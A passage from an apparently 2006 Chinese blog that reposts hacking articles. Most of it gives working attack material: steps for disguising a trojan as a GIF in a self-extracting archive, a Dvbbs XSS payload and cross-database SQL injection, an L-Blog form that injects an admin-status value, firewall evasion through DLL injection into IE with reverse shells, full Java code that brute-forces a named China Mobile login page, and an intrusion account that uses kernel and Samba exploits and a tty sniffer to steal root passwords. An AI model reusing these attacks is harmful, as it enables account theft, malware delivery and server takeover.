利用QQ的视频电话功能,也可以帮我们挖出隐身好友,方法很简单:双击对方头像,然后在聊天窗口中单击“视频”按钮,此时会向对方提交一个视频对话请求。在大多数情况下,这个烦人的对话框足以让对方“拒绝”或是关闭,这样便可以通过拒绝信息探知对方在线。如果对你的邀请窗口无动于衷,那此法就失效了。

四、移动QQ
适用软件:QQ

就QQ而言,利用移动QQ服务可以准确地验证对方用户是否隐身,前提是你须先开通移动QQ,然后在手机上以“60#QQ号码#所要发送的信息”的格式编写短信发送到服务号码,然后根据系统有无回复便可判断。如果手机没有收到该回复,则该用户处于隐身状态,否则你将收到“您发给QQ用户的消息已发送给对方手机”的叫复。用此法找出隐身好友的命中率高达100%,有钱真好啊!
类别: 无分类 |  评论(0) |  浏览(29961) |  收藏
2006年09月27日 21:01:20

通过页面转向的方法绕过防火墙限制[zt]!!!!

您是否碰到过这种情况,您所在的公司或学校的主机装有防火墙,由于这些防火墙的限制,使你不能随意去看某些网页或访问某些服务器,如果你回到“是”,那么就恭喜你了,因为我有办法绕过这些防火墙。
  方法一:用网页转向功能

  有些网站提供网页转向功能,那个提供这个功能的服务器就好像是代理一样差不多,这种方法过滤防火墙的原理如下:

  假设一个防火墙不允许用户去看http://www.buxuqu.com这个网站,但可以去一个叫http://www.proxy.com的网站,而这个网站是有网页转向功能的。这样该用户可以先去该网站,然后在指定的位置输入http://www.buxuqu.com,这样就可以访问了。因为防火墙只是拦住到http://www.buxuqu.com的请求,但对于http://www.proxy.com的请求却不拦截。。

  下面这两个网站就有网页转向功能,你可以试试:

  http://www.anonymizer.com/
  http://www.anonymise.com/welcomeJava.html

  方法二:使用软件

  用这种方法要用到一个叫Httport的工具软件,下载地址是:http://202.103.134.147/download/swdetail.phtml?id=2616。该程序主要是在本地将一个端口映射到一个代理上去,利用这个功能是有可能突破防火墙限制的。比方说,你所在电脑被防火墙挡住,只提供一个HTTP代理让你出去,而你又想使用其它诸如FTP、POP3等服务时,此时这个软件就能发挥作用了。不过该软件不支持需要用户名和密码的HTTP代理。要使用这个软件有个前提:你必须有在浏览器上设置代理的权限。由于使用很简单,这里就不再详细介绍了,你可以自己试试。

  现在,你可以自由的翱翔在无限精彩的网络空间了,你已经成功绕过防火墙的限制了
类别: 无分类 |  评论(0) |  浏览(8662) |  收藏
2006年09月27日 21:00:17

浅析如何控制内网机器[zt]!!!

小黄是一家咨询公司的职员,每天上班都离不开电脑,更离不开网络,电脑就是他的“爱姬”(机),而网络就是他的全部“关系网”。这天“小黄”在聊QQ时,机器频频自动关机,有时自动重启,小黄为此非常烦恼。多次想过重装系统了事,但于心不甘,如果下次再遇到这样的问题又怎么解决呢?垂头丧气的小黄只好向反黑刀报案,请求反黑刀来为他侦破了……

案情分析:

诡异!电脑频频自动重启、关机

反黑刀“听罢报案,已明就里”。系统自动关机通常有以下几种原因:

1.病毒作祟

一般来讲,出现自动关机往往是由于中了病毒,比如时下非常流行的冲击波病毒或者震荡波病毒。从这点上看,小黄的机器很可能是中了病毒,但是通过专杀工具很快就查明了并非病毒所致!

提示:如果你不幸中了冲击波病毒或者震荡波病毒,请到以下网站去下载专杀工具并打好系统补丁:

“冲击波病毒”专题:http://soft.yesky.com/SoftChannel/72348998979026944/20030813/1721208.shtml
“震荡波病毒”专题:http://soft.yesky.com/SoftChannel/72348998979026944/20040509/1795072.shtml

2.黑客控制

大家知道,目前有很多远程控制软件能够实现远程计算机的管理和控制,当然也能让远程计算机关机或者重新启动。小黄是不是遇到黑客了?反黑刀首先分析了小黄的网络环境:使用单位局域网连接到网络,一般来说,处于局域网内部的机器很少能被黑客攻击,因为他们没有独立的外网IP地址!难道真的是……

“看来你遇到了远程控制的黑客”。考虑到小黄是个聊天狂热者,反黑刀成竹在胸地说,“你用QQ聊天时肯定接收过一些别人发过来的软件或者图片之类的东西,而且是在接收到别人发来的QQ消息后,你的机器才自动关机的……”小黄打断了反黑刀的话,“你怎么知道的?”小黄开始暗暗佩服反黑刀的高明……

突击侦破:

QQ远控精灵,内网机器也遭毒手

反黑刀根据小黄报案的种种情况分析,认定黑客是使用了QQ远控精灵控制了小黄的机器!QQ远控精灵是黑客的“得力帮凶”。该软件是一个利用QQ来进行远程控制的小木马,可以利用QQ聊天来实现对局域网内部机器的控制。

使用该软件时,黑客先在被控制者的机器里种植木马,然后通过QQ向对方发送相应的命令语句来控制对方机器执行各种命令。如发送“在干吗?”对方电脑就会自动抓屏并保存;发送“死机了?”对方电脑就会自动关机等等。下面看看黑客是如何对小黄的机器进行控制的。

攻击第一步:生成并发送木马

黑客会首先运行QQ远控精灵,要使该软件起作用,黑客首先要设置好他的“邮箱地址”、“邮箱服务器”、“密码”、“用户名”以及非常重要的“识别代码”。设置完毕后,点击右边的“生成木马”选项,会弹出一个提示框,以确认是否发送测试邮件。

生成完木马后,黑客接下来就会想方设法让被控制者运行刚才生成的木马。
小黄听着听着懊恼地说道:“都怪自己想看PLMM的照片,给自己机器被人控制埋下了祸根!以后说什么也不会上这种当了”!

攻击第二步:远程控制计算机

一旦中了黑客发来的木马,下一步黑客就可以让QQ远控精灵大显身手了。只要点击主界面中间的“文件管理”、“电脑管理”、“杂务控制”中的任何一项即可看到相关的选项。例如选取“电脑管理”选项,再选择其中的“关闭对方计算机”、“抓取对方电脑屏幕”等,点击后面的黑色“GO”按钮,即可在最下方生成一段代码,只要复制并粘贴这段代码到QQ消息中,发送给对方即可让对方死机或者执行相应的操作。这下电脑的控制权就交给黑客了,所以小黄的机器就会不断关机、重启!

小黄赶紧去查看了一下自己电脑中的机密文件,还好没有被修改。

反黑刀支招:

摆脱QQ远控精灵的控制

要有效防范QQ远控精灵的控制,需要做好以下三方面的工作:

1.不要轻易打开一些来历不明的邮件及附件;不要轻易接收QQ好友发来的文件,特别是陌生人发送的文件,因为里面很可能就是木马或者病毒。要消除这种隐患,不给别有用心的“黑客”有机可乘!

2.如果发现了类似以上的种种症状,应立即将这个“好友”拖入黑名单,要痛打落水狗,不给他逞凶的机会。

3.升级到最新版本的瑞星杀毒软件,可以彻底查杀此病毒。瑞星杀毒软件标准版和网络版的用户可以直接登录瑞星网站(http://www.rising.com.cn/)下载升级包进行升级,或者使用瑞星杀毒软件的“智能升级”功能。
类别: 无分类 |  评论(1) |  浏览(10451) |  收藏
2006年09月27日 20:59:17

用WinRAR解析木马病毒的捆绑原理[zt]!!!!

今天朋友突然想我求救,说网络游戏传奇世界的号被盗了,由于朋友是在家上网,排除了在公共场所帐号和密码被别他人瞟视的可能。据朋友所说,在被盗的前一个多小时,在网上下载了一个网友的照片,并打开浏览了,但是出现的确实是网友的照片,并且是用“Windows 图片和传真查看器”(朋友家是XP系统)打开的,这也可以肯定一定是图片文件。朋友还告诉笔者后缀名是.gif,很显然是图片文件,朋友的电脑也没有安装杀毒软件,并且最重要的是那个文件还没有删。

笔者便让朋友把那个文件通过QQ发了过来,发送的时候笔者在QQ显示文件名中发现了那个文件并不是gif文件,而是exe文件,文件名是:我的照片.gif.exe,并且它的图标也是图片文件的图标,见图1。笔者认为朋友的电脑应该打开了“隐藏已知文件类型的扩展名”(大家可以在“我的电脑”菜单中“工具→文件夹选项→查看→高级设置”中设置,见图2,所以告诉我后缀名是gif。笔者无意中右点了下这个文件,发现可以用“WinRAR打开”,于是笔者就用WinRAR打开了,发现里面含有两个文件——我的照片.gif和server.exe,可以肯定这server.exe就是木马,也就是朋友盗传奇世界号的罪魁祸首。

由于可以直接用WinRAR打开,笔者断定它就是由WinRAR制作的,现在笔者就开始解密它的制作过程。首先要有图片文件的ico(图标)文件(可以使用其他软件提取,笔者就不在这里讲述详细过程了),如图3。把图片文件和木马都选定,右点,选择“添加到档案文件”(WinRAR的选项),见图4,在“档案文件名”那输入压缩后的文件名,比如:我的照片.gif.exe,后缀如果为.exe就可以直接执行,如果不是.rar就会打开WinRAR,所以这里最后的后缀为.exe,根据自己的需要选择“压缩方式”,然后点击“高级”标签,选择“SFX 选项”,见图5,在“释放路径”中填入你需要解压的路径,笔者这里填的是“%systemroot%\temp”(不包括引号),表示解压缩到系统安装目录下的temp(临时文件)文件夹下,并且在“安装程序”的“释放后运行”输入“server.exe”(不包括引号),在“释放前运行”输入“我的照片.gif”(不包括引号)。

这样在解压缩前将会打开我的照片.gif这个文件,造成朋友对文件判断的假象,会认为它就是一个图片文件,而释放完以后便会自动运行木马(即server.exe)。在“模式”标签的“缄默模式”中选择“全部隐藏”,“覆盖方式”中选择“覆盖所有文件”,在“文字和图标”标签的“自定义SFX图标”,载入刚才所准备的图片文件的ico文件,然后点击“确定”即可,这样即天衣无缝的制作了一个捆绑图片的木马。当打开这个文件时,会先运行图片文件,再自动打开木马文件,中间不会出现任何提示。

注:希望广大朋友不要进行非法用途,在这里解密木马捆绑是希望大家了解其原理。
类别: 无分类 |  评论(0) |  浏览(8293) |  收藏
2006年09月27日 20:58:19

动网7.1.0存在泄露绝对路径漏洞[!!!]zt

厂商名字:动网先锋论谈
厂商地址:http://www.dvbbs.net/
漏洞程序:Dvbbs 7.1.0
漏洞描述:
Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图,代码如下:
GIF89a
<script>alert(document.cookie)</script>
抓包得到cookie如下
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs=
分析cookie可以得到站点的绝对路径如下:
d://web//dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞,但是找不到表名和字段名。
注入点假设:
www.host.com//linzi.asp?fuck=you
论谈为dvbbs 7.1.0 ,数据库为data////dvbbs.asp,做了防下载处理.
利用上面的动网暴路径,抓包得到绝对路径为 d://www//dvbbs//data//dvbbs.asp
实现跨库查询如下:
www.host.com//linzi.asp?fuck=you and (select count(*) from dv_admin in "d://www//dvbbs//data//dvbbs.asp")
官方补丁:
尚无
类别: 无分类 |  评论(0) |  浏览(8212) |  收藏
2006年09月27日 20:57:17

L-Blog1.08(SE) 提权漏洞[zt]!!!!

html>
<head>
</head>
<body>
<table width="768" border="0" align="center" cellpadding="4" cellspacing="6" background="images/blog_main.gif">
<tr>
<td width="128" align="center"><strong>用户编辑</strong></td>
<td valign="top" align="center"><table width="95%" border="0" cellpadding="4" cellspacing="1" bgcolor="#CCCCCC">
<tr bgcolor="#EFEFEF">
<td colspan="2"><b>编辑个人资料</b></td>
</tr>
<tr bgcolor="#FFFFFF"><form action="http://url/member.asp?action=edit&edit=post" method="post" name="Submit" id="Submit">
<td width="98" align="right" nowrap>名称:</td>
<td width="100%"> 9xiao</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>旧密码:</td>
<td> <input name="mem_OldPassword" type="password" id="mem_OldPassword" size="16">
<span class="htd"><b><font color="#FF0000"> *</font></b> 修改资料必须输入原密码</span></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>新密码:</td>
<td> <input name="mem_NewPassword" type="password" id="mem_NewPassword" size="16">
<span class="htd"><b><font color="#FF0000">*</font></b> 密码必须是6-16位</span></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>确认密码:</td>
<td> <input name="mem_RePassword" type="password" id="mem_RePassword" size="16"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>性别:</td>
<td><input name="mem_Sex" type="text" size="36" value=0,mem_Status="SupAdmin" ></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>邮箱:</td>
<td> <input name="mem_Email" type="text" id="mem_Email" value="pyadong at 263 dot net" size="30">

<input name="mem_HideEmail" type="checkbox" id="mem_HideEmail" value="1" >
隐藏邮箱</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>腾讯QQ:</td>
<td> <input name="mem_QQ" type="text" id="mem_QQ" value=""></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>个人主页:</td>
<td> <input name="mem_HomePage" type="text" id="mem_HomePage" value="" size="35"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>个人简介:</td>
<td> <textarea name="mem_Intro" cols="50" rows="5" wrap="VIRTUAL" id="mem_Intro"></textarea></td>
</tr>
<tr align="center" bgcolor="#FFFFFF">
<td colspan="2">
<input type="submit" name="Submit" value=" 确定编辑 ">
</td>
</tr></form>
</table></td>
</tr>
</table></body>
</html>

action="http://url/member.asp?action=edit&edit=post" 替换为目标url,1.10版本抓包修改mem_Sex值为“0,mem_Status="SupAdmin"”
类别: 无分类 |  评论(0) |  浏览(8027) |  收藏
2006年09月27日 20:56:20

5种方法逃过防火墙控制系统的研究[zt]!!!!

随着木马,后门的不停发展,防火墙本身也在不断地发展,这是一个矛和盾和关系,知道如何逃过防火墙对于控制一台系统是有很重大的意义的。
  由于防火墙的发展,时至今天,很多防火墙都是以驱动形式加载的,核心部分是在驱动那里,保留一个界面给用户去设置,这个界面程序同时充当了桥梁作用,传统的杀防火墙进程以达到能控制到系统的方法已经是失效的了,而且这也不是一个好的方法(想想管理员发现防火墙的图标不见了会有什么反应).以下是谈谈以种方法。
前提条件:
1.你在远程系统有足够权限
2.你已从ipc或mssql或其它得到系统的权限,但因为无论用ipc还是用mssql
的操作,都并不如直接得到一个cmd的Shell操作来得快和方便

方法1:不让防火墙加载自己
使用各类工具,pslist,sc.exe,reg.exe等去查找防火墙在哪里加载的,如果
是在run中那加载的话,用reg.exe将其删除;如果是服务启动,用sc.exe
将服务改为手动或禁止,然后重启那系统,这样系统重启后防火墙就无法加载自己了。这种方法不让防火墙运行,比较容易被管理员发现。

方法2:强行绑入防火墙允许的端口
一台系统,如果有一些服务,如pcanywhere,sev-u,iis,mssql,mysql等的话,防火墙总要允许这些应用程序打开的端口被外界所连接的,而这些应用程序打开的端口是可以被后门或木马程序自身打开的端口重新强行绑入的。例如pcnayhwere打开端口或serv-u打开的端口都可以被重新绑入,iis和mssql等就有时可以,但有时会失败,原因不明。 由于那些应用程序是得到防火墙的授权并信任的,所以后门或木马将绑口强行绑入后,是可以避开防火墙的,但这种方法对于那些比较高级的防火墙,如Zonealarm等,还是不行的,因为Zonealarm不只是监视端口,而且监视是什么程序尝试去绑入某个端口的,如果后门没得到Zonealarm授权的话,一样是无法绑入那个端口的。

方法3:icmp协议或自定义协议的后门或木马
对于一些防火墙是有效果的,但是如果防火墙是检测有网络连接的程序是不是防火墙信任的,那么这个方法就会失效,因为这类防火墙允不允许程序连接网络是根据用户是否让那程序连接的,而并不是单单看协议或端口。

方法4:将后门或木马插到其它进程中运行
系统中某些程序,99.9999%的用户都会允许的,象IE,如果有用户不允许IE连接网络的话,那是很稀见的。因为IE一般都是防火墙信任的应用程序,所以只要将后门程序插入到IE中运行,那么防火墙一般是不会拦的。只要防火墙允许IE连接网络,那么插入到IE中运行的后门就可以接受外界的连接了。这类后门一般是以Dl加载进去IE运行的,直接一个可执行程序将一个线程注入IE运行也可以,但远没有将
DLL注入那么稳定。这种方法可以避开大部份的防火墙,但对于一些不但会检查out bound,而且会检查in bound连接的防火墙会有时失效。但总的来说,这算是一种很好和方便的方法(已经过测试).

方法5:将后门插入到IE中运行,并且使用反向连接
上面方法4已说明了IE一般是防火墙信任的应用程序,所以将后门插入到IE中运行已是一个好方法了,由于某些防火墙还会检查in bound连接(从外界连入系统的连接),是会导致方法4失效的,因为防火墙是可能通知用户是否允许这个连接的,只要用户拒绝,那么方法4就失效了。
但如果将后门插到IE中运行,并且让后门自动向外界一个指定的IP中连接(反向连接),这样的话,几乎99%是会成功的,因为防火墙是已允许IE向外连接的了,所以一旦后门连接上那个指定的IP,攻击者就可以得到一个cmd下的Shell.

上面所说的几种方法中,方法1,2,3应用面是很窄的,而且并不能算是一种好的方法;方法4,5是比较高级的方法,而且管理员一般很难发现(一般不会有人会怀疑自己的IE被人插入后门在运行的,相信大部份上网用户不会知道有这些方法的),而且这些方法比较难检测出来。当然还会有其它方法的,知道的朋友可以跟贴讨论一下
类别: 无分类 |  评论(0) |  浏览(12617) |  收藏
2006年09月27日 20:54:52

河南移动网络客服系统验证码的缺陷分析和利用[zt]!!!

先声明哦 本文没有技术含量---只是为了证明java也可以作破解工具
  中国移动的在线客服系统大家应该非常熟悉,因为我是移动忠实的河南用户,自然就从河南移动说起.在移动大厅办理过业务的用户都很清楚,用户密码只能设置成6位数0~9.而网上服务系统和移动的核心数据库是同步的,密码也只能局限为6位数字.如此简单的密码组合非常适合暴力破解.
  我们来分析一下暴力破解的可行性.首先,系统对当天登录的次数要没有限制,我随便输入一个手机号测试系统容错次数.我试了十次,依然可以进入登录界面(yes~有戏).接下来,分析系统登录需要提交的关键字段.来看看登录页面http://khfw.ha.chinamobile.com/new_wskf/login/login_portal.jsp
__________________________________________
.....................
<form method="post" name="thisform"
//post 方式提交数据
...........
action="/servlet/com.huawei.icd30.wskf.login.LoginCheck"> -->
//处理登录事件的servlet 看来是它接收的参数.
<input type="hidden" name="forwardFlag" value="0">
  //关键字段 forwardFlag 不知道什么用处,但多次刷新页面无改变
<input type="hidden" name="transaction" value="3">
  // 关键字段 transaction 同上 
<input type="hidden" name="ssRandomPass" value="dNZjN/vfR4HwMACDVqhncQ==" >
  //关键字段 ssRandomPass 每次刷新得到新的随机值,在页面无显示
  //可能是身份识别的隐含信息
......................
//以下是用户提交的表单内容
<td><input type="text" name="userName" size="14"
//呵呵 手机号
<td><input type="password" name="passWord"
  //手机密码
<td><input name="randomPassword" type="text"
  //图片验证码
.......................................
___________________________________
综上得post内容为:forwardFlag=0&transaction=3&ssRandomPassdNZjN/vfR4HwMACDVqhncQ==&userName=135********&passWord=******&randomPassword=****

passWord是我们要猜解的内容,如何锁定randomPassword(验证码)是关键.具体就是如何对图片验证码做解析.说到这里就不得不提一下,在没有验证码的时代,许多暴力破解软件非常流行,对于入侵大多数邮件服务器和论坛是非常行之有效的方法.也捧红了一批经典破解软件,如流光,溯雪.(呵呵,都是值得珍藏的文物)
  我们来看看这里的验证码是如何生成的右键单击验证码图片.哈哈,我们看到了什么?http://khfw.ha.chinamobile.com/s ... let?randomPass=9814<--这是不正是我们的验证码值吗?
我们访问com.huawei.icd30.wskf.console.ImageServlet应用改变randomPass的值为1111 呵呵,不出所料生成了数值为1111的图片.由此可见,登录验证程序和验证码的生成是两个应用.由返回的登录页面传递参数请求com.huawei.icd30.wskf.console.ImageServlet生成验证码.

到这里我们的分析工作就算完成了.如何用程序实现暴力破解没有技术难度.我写了一个java版的application win2000下编译测试成功,效仿一些QQ破解模式,密码为123456,不断变换猜解手机号,10分钟不到就找到了一个密码为123456的用户. 

******本代码只做研究,对于该程序可能造成的后果本人概不负责********

源代码如下:
--------------
import java.net.*;
import java.io.*;

public class Result
{

public static String ssRandomPass,randomPassword;
public static int passWord=123456,num=00000;
//设置六位手机密码和手机后五位号码

public static void main(String args[]){

while(true)
{
check();
//该函数捕获登录页面关键字段

try {
URL url = new URL("http://khfw.ha.chinamobile.com/servlet/com.huawei.icd30.wskf.login.LoginCheck");;
URLConnection connection = url.openConnection();
connection.setDoOutput(true);

OutputStreamWriter out = new OutputStreamWriter(connection.getOutputStream(), "8859_1");

out.write("forwardFlag=0&transaction=3&ssRandomPass="+ssRandomPass+"&userName=
135286"+num+"&"+"passWord="+passWord+"&randomPassword="+randomPassword);//这里组织提交信息
out.flush();
out.close();
//获取返回数据

BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
String line = null;
StringBuffer content= new StringBuffer();
while((line = in.readLine()) != null)

{
//line为返回值,这就可以判断是否成功、

content.append(line);
}

in.close() ;
in=null;
url=null;
String msg = content.toString();

System.err.println("Back code:"+msg.length()+" check passwd:"+passWord);
System.err.println("check num:135256"+num);
if(msg.length()==412|num==99999)
{
     System.err.println("Get one phonenumber");  
System.err.println(msg);
break;
}
// passWord++;
num++;

} catch (MalformedURLException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}

}
}

public static void check()
{
StringBuffer ssR = new StringBuffer();
StringBuffer rand = new StringBuffer();
try {
URL url = new URL("http://khfw.ha.chinamobile.com/new_wskf/login/login_portal.jsp");
URLConnection connection = url.openConnection();
connection.setDoOutput(true);

OutputStreamWriter out = new OutputStreamWriter(connection.getOutputStream(), "8859_1");
out.write("?");
out.flush();
out.close();
//获取返回数据

BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
String line = null;
StringBuffer content= new StringBuffer();
while((line = in.readLine()) != null)

{
//line为返回值,这就可以判断是否成功、

content.append(line);
}

in.close() ;
in=null;
url=null;
String msg = content.toString();

for (int i=0;i<=23;i++)
ssR.append(msg.charAt(1534+i));
ssRandomPass=ssR.toString();
System.err.println(ssR.toString());

for (int i=0;i<=3;i++)
rand.append(msg.charAt(2492+i));
randomPassword=rand.toString();
System.err.println(rand.toString());


//System.err.println(msg);
} catch (MalformedURLException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}

}

}

类别: 无分类 |  评论(0) |  浏览(8856) |  收藏
2006年09月27日 20:53:22

绝处逢生:Windwos 2003下权限提升[zt]!!!

前几天渗透了某大型网站,兴奋中。拿到WebShell后,第一个念头就是提升权限,把偶亲爱的后门挂到系统里。熟练的打开CMD,输入NET USER。
  不是好兆头,接着在WSCRIPT组件前打钩,再次执行NET USER。

  提示倒是换了,但是结果一样。接着偶想到了上传CMD.EXE,但是Windows 2003的上传在默认时是有限制的,不能大于200K,于是我上传了经典的Serv-U本地溢出程序,使用在Windows 2000下没有禁用WSCRIPT时的无敌调用提权大法。

  其实就是在调用CMD的地方写上本地溢出程序的路径及参数,一般在没有禁止WSCRIPT组件时,此法的成功率很高。但是结果依然是“禁止访问”,看来Windows 2003在默认情况下,安全性比Windows 2000默认时要强许多。失望之余,想到干脆去首页挂个马吧,最近正在玩PcShare,嘿嘿。跑到首页,加入偶的木马代码,点保存,“没有权限”,偶倒!太BT了吧?连修改首页的权限都没?管理员一定是把IIS用户降低到了GUEST组,或者给IIS目录单独设置了一个GUEST组的用户,并去掉了修改文件的权限。上帝太不公平了,怎么说都是偶辛辛苦苦搞来的Shell啊,现在一点用都没有!

  没办法,看看服务器里有啥好东西吧。翻来翻去,忽然眼前一亮:在某个目录里发现了congif.aspx文件。写到这里各位以为偶是要使用SA账号,通过SQLROOTKIT执行系统命令吧?错,偶看过了,账号不是SA权限的,是PU权限,什么都不能做,而且也不属于本文的介绍范围。偶注意的“ASPX”这个后缀,在默认安装情况下,IIS 6.0是支持.net的,也就是ASPX文件,但是在IIS 6.0里,ASP和ASPX两个扩展使用的却是2个不同的用户角色,ASP使用的是IUSER用户,管理员一般都比较注意这个账号,害怕被提升权限,所以把权限都降低到了GUEST,所以在ASP的WebShell里什么也不能做了。但是网管往往忽略了ASPX!由于.net使用的系统账号是ASPNET,而在默认情况下,这个账号是属于USER组的,这样我们上传一个.NET的后门上去,会以USER组的用户ASPNET执行命令,权限会有很大的提高,就可以提权了!

  说做就做,立即上传了一个ASPX的后门上去,打开CMD模块执行NET USER。

  哇哈哈,果然不出偶所料,终于可以执行CMD了!来看看权限,输入“net localgroup guests”。

  看到了吧?刚才我们在AspWebShell中使用的账号是IUSER_WEBSITE,属于GUESTS组,难怪什么权限都没有呢。再来看一下USERS组。

  ASPNET就是现在我们的AspxShell使用的账号,权限是USERS,比Guest大好多,嘿嘿!

  其实这并不算是什么漏洞,只是由于管理员粗心大意造成的隐患而已。算是提升权限的一个思路吧。如果管理员把ASPNET也降低权限,或者删除ASPX这个扩展,本文的方法就不管用了,不过这样的管理员到目前我还没遇到过。总之,整体安全才是最重要的。不要放过每一个细节。
类别: 无分类 |  评论(0) |  浏览(8932) |  收藏
2006年09月27日 20:52:20

渗透国内某网络游戏服务器群记实[ZT]!!!!

没什么技术性,只是想说明现状

现在想弄钱的入侵者,似乎热衷于入侵网络游戏服务器,盗出游戏服务器程序或是数据库。国内的网络游戏企业,都应该招受过此损失,有暴露出来的,有没暴露出来的。但游戏企业对安全问题理解都十分片面,狭隘!

当然,不只是网络游戏企业。近一两年来,入侵者乐此不疲,各种商业数据的偷盗在国内几乎快形成一种"圈内产业"。不论是技术性还是行事组织性都与早年不可同日而语。需求与供应在这里似乎有着完美结合。再看看各地公安网监部门,媒体似乎每天都有报道关于某地公安抓获某黑客的事件。但却似乎没有一起真正成熟的案件。抓到的都是小鱼,大鱼都在偷着乐。原因有没发现没报案的,也有网监部门的技术问题。还有就是官僚主义,公安部门发布所谓的“战果”也乐此不疲。

话不说远了,转入正题。

一个好友在国内某网络游戏企业工作,让我帮忙测试他们游戏服务器群的安全性。加上我这段时间闲得无聊,也就答应了。

我先下载了游戏客户端程序,得到到了几个游戏服务器的地址。
游戏帐号在WEB网站上也可以注册,看来游戏中央数据库的调用WEB网站也可以。
先仔细的检查了一下WEB网站,大部分是PHP+MYSQL的。代码写得还不错,几乎找不到什么突破口。再看看MYSQL,禁止远程连接。查看了其他游戏服务器,都是LINUX系统,都只是开了OPENSSH和游戏服务器程序端口。只有WEB网站多个80,而又没什么可利用的地方。

看上去安全做得不错,但这是种幻象!

随后仔细分析了下游戏客户端程序,我打开Sniffer Pro以便记录下客户端程序和服务器的所有通信。发现客户端程序有个自动更新功能,我Sniff到是通过FTP去下载更新文件的。但我扫描所有游戏服务器时没发现这个FTP端口啊(8888)。仔细看了一下,原来这个端口连接延时十分长。所以扫描器没发现这个端口。

意外的从更新过程中,竟然Sniff到一个固定的更新程序的FTP帐户。检查了FTP服务器是ProFTPd,我没直接用这个帐户去溢出ProFtpd。因为这台服务器开了SSH,我直接拿帐户去登陆SSH,获得一个权限极低的shell。

就像一块布,一但撕开一丁点口子,只要稍一加力,整块布都会随之撕开!

在系统中寻觅了半天,终于寻找到一个有权限去写的tmp目录。查看了内核版本,用kernel do_brk()的问题溢出提升权限获得了rootshell,没去装rkt,因为只是帮忙测试.

检查了系统的路由表,发现有一个内网,最后确认是VPN,原来所有游戏服务器之间的连接是通过VPN,防火墙的信任检查,都是通过内网的IP地址。外网访问这些服务器都只能看到22端口和游戏服务程序端口。

在这台已控制的服务器上下载了一个nmap,扫描了其他服务器,发现其中一台开了Samba,查看了一下版本,存在问题。溢出并获得了rootshell。

到现在为止以控制两台服务器,我把两台服务器的shadow文件都弄回来,拿jonh跑了一遍,没什么弱智密码。看来密码还设得挺好的。

逛尤了一会,在开了Samba的服务器上,发现了游戏服务器程序。并随之在game.conf文件中发现了中央数据库的地址和一个数据库帐户。登上去看了一下,数据库太庞大,放弃了dump出来的念头。

好象没有必要去分析游戏服务器程序,找出vul,去exp,来撕开其他服务器

但从其中的一个名为"weihu"的table中,发现一个后台管理帐户和密码,这个密码大小写互换加数字加符号。

我在web网站上找到一个后台入口,并用在数据库得到的帐户登陆成功。发现后台管理系统中有一个上传的功能,而且没检查文件后缀名。存放文件目录也是在web目录之下。上传了一个phpshell,执行命令成功,随后我又获得提升权限为root的shell。

发现这台机器上还有个root在上面工作,但正在专注用vi编辑一个文件。没发现我。但我想到一个恶作剧。我给这台web网站服务器装了个能监视tty输入的sniff,随后又skill了那个root,那个root被踢下去没多久,又登陆上来。但我立马就抓到了他的密码。

我用这个抓到的密码去登陆其他服务器的SSH,并也用root帐户,都登陆成功。

感觉所有服务器的系统都应该是直接拷的盘,因为系统版本和所安装的程序和一些配置大都相同。

至此已经控制游戏服务器群的所有服务器,其中还有一台是SMS网关。

我们的游戏时间结束。只是因为一个小问题,最后导致整个服务器群被控制,其实这在安全问题上,这是必然会发生的。安全无小事!

其实这家企业对安全也有投入,硬件防火墙,支持VPN的。但因为一个程序自动更新的设计上的小失败。导致一切都虚设。

随后我把整个过程告诉了我那朋友,听得他立马向他们主管汇报了问题。

如有其他游戏企业被入侵,雷同文章所说,那纯属巧合,本人概不负责!

类别: 无分类 |  评论(0) |  浏览(9180) |  收藏
2006年09月27日 20:50:07

向Google看齐 微软免费开放网络办公软件

微软的Office套装毫无疑问是桌面软件的标尺,但是随着Google开始迈向网络型的办公应用程序的开发,微软理所当然会紧随其后。微软可能会提供文字处理以及电子表格软件的基础版,这些费用将由广告费来支付。

  微软正在考虑让用户可在线使用其办公软件,但是同样还要尽力避免影响Office-这个为软件业巨人带来巨大利润的优势产品的销售。微软可能会以预先定购的模式来提供在线软件。

  微软的Alan Yates称,微软将会考虑众多选择以吸引入门级用户。 “我们还在考虑如何充分利用新的业务模式,如广告和其它支付模式,以及新的发放形式。” Yates如是说

  很明显,微软的长处在于经验以及其办公软件的成熟和完善。与Word的功能组相比,Google的Writely显得苍白无力,但是Google能轻易超过微软凭借的是其各种协作功能。Writely用户们可以同时进行修正工作并互相共享文件,而Word用户仍只能来回传送文档。微软计划在其Office Live软件中突破这个限制,但那当然不会是免费的。
类别: 无分类 |  评论(0) |  浏览(10665) |  收藏
2006年09月27日 20:47:06

Vista安全中心无法禁用,赛门铁克很恼火

据国外媒体报道,著名安全厂商赛门铁克日前抱怨,称微软的新一代操作系统Windows Vista的“安全中心”面板不容许第三方用户关闭,这将使用户的选择权受到限制。

